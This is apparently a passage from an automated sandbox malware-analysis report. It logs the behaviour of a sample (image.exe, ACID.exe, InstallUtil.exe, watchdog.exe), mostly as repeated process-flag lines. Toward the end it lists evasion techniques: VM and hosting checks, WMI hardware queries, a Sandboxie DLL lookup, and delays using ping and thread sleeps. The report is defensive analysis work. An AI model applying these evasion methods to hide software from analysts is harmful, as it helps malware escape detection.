                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to delay execution (extensive OutputDebugStringW loop)
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: OutputDebugStringW count: 128
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, ACID.exe, 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Uses ping.exe to sleep
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 4B70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 5D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 7120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 8120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: 8380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 6100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 5870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 2290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 42D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 1120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMemory allocated: 2C60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599165Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeWindow / User API: threadDelayed 1836Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeWindow / User API: threadDelayed 6685Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeWindow / User API: threadDelayed 2250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeWindow / User API: threadDelayed 7346Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2152Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 713Jump to behavior
                    Source: C:\Users\user\Desktop\image.exe TID: 2304Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\image.exe TID: 6472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 3708Thread sleep time: -71000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 1804Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exe TID: 776Thread sleep time: -53000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 2152 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 713 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -599165s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -598968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -598734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -598265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99594s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99467s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99225s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -99000s >= -30000sJump to behavior
